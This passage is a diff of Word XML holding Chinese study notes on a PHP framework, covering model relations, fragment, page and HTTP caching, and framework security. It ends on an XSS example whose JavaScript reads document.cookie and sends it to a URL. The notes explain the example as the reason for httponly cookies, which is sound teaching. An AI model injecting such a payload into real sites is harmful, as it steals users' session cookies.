+              <w:t>;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12479,6 +13843,7 @@
               </w:rPr>
               <w:t xml:space="preserve">echo </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -12486,6 +13851,7 @@
               </w:rPr>
               <w:t>LinkPager</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -12881,12 +14247,14 @@
             </w:r>
           </w:p>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>activeRecoed</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -13196,12 +14564,28 @@
               </w:rPr>
               <w:t>多表关联查询：</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>hasMany/hasOne</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>hasMany</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>hasOne</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>设置关联关系并获取数据</w:t>
             </w:r>
@@ -13381,9 +14765,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -13478,9 +14859,6 @@
           <w:p>
             <w:pPr>
               <w:ind w:firstLineChars="150" w:firstLine="315"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -13562,11 +14940,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -13722,11 +15095,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -13777,17 +15145,558 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
               </w:rPr>
               <w:t>片段</w:t>
             </w:r>
             <w:r>
-              <w:t>依赖：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>视图网页中不太变化的部分可以作为片段缓存保存，提高加载速度。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31506DFB" wp14:editId="5D33808C">
+                  <wp:extent cx="3419475" cy="1285875"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+                  <wp:docPr id="37" name="图片 37"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId44"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3419475" cy="1285875"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>设置缓存保存时间：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C550679" wp14:editId="602A18ED">
+                  <wp:extent cx="3952240" cy="225425"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+                  <wp:docPr id="40" name="图片 40"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId45"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="225425"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>设置缓存开关：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31C2D780" wp14:editId="317F03B3">
+                  <wp:extent cx="3952240" cy="236220"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="41" name="图片 41"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId46"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="236220"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>片段缓存嵌套：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:b/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>外层的缓存时间要小于等于内层的缓存时间</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>，否则会出现内层的缓存时间过期但由于外层缓存时间未过期的原因内层已改变的内容未及时显示</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>页面缓存：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>需要用到行为，在行为中设置页面缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>behaviors</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>会截获访问，先执行行为中方法再去执行具体的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>操作，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>only</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>可以指定还错所有操作，还是某个操作</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260BFB11" wp14:editId="1E221161">
+                  <wp:extent cx="3951605" cy="3244215"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="43" name="图片 43"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId47"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="3244215"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>http</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>缓存：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>将页面缓存在浏览器，下次访问时服务器发送</w:t>
+            </w:r>
+            <w:r>
+              <w:t>304</w:t>
+            </w:r>
+            <w:r>
+              <w:t>（</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>l</w:t>
+            </w:r>
+            <w:r>
+              <w:t>astModified</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>），浏览器知道页面没有修改之后，直接使用缓存的页面显示。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EEA862E" wp14:editId="704AF7B5">
+                  <wp:extent cx="3952240" cy="3672205"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+                  <wp:docPr id="45" name="图片 45"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId48"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3952240" cy="3672205"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>判断页面是否修改的依据：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="300" w:left="630"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>//1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>、根据时间缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>lastModified</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>function()</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>//2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>、根据内容变化缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>etagSeed</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>=&gt;function(){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="2" w:name="_GoBack"/>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -15067,11 +15067,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -15329,13 +15324,7 @@
               <w:t>，否则会出现内层的缓存时间过期但由于外层缓存时间未过期的原因内层已改变的内容未及时显示</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+          <w:p/>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -15358,11 +15347,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -15401,11 +15385,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -15496,11 +15475,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:noProof/>
@@ -15695,10 +15669,1229 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">3.4 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>框架安全</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6439"/>
+        <w:gridCol w:w="6440"/>
+        <w:gridCol w:w="6440"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>XSS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>攻击</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>：跨站脚本攻击</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07F911DE" wp14:editId="2045BC0C">
+                  <wp:extent cx="3951605" cy="623570"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+                  <wp:docPr id="44" name="图片 44"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId49"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="623570"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>javascript</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>攻击</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>例如：盗取账号和</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>httponly</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> cookie = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>document.cookie</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>window.location.href</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>='http://127.0.0.1/index.</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>php?cookie</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'+cookie;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="100" w:firstLine="210"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>设置某些敏感</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>cookie</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>时附带</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>httponly</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，这样可以防止通过</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
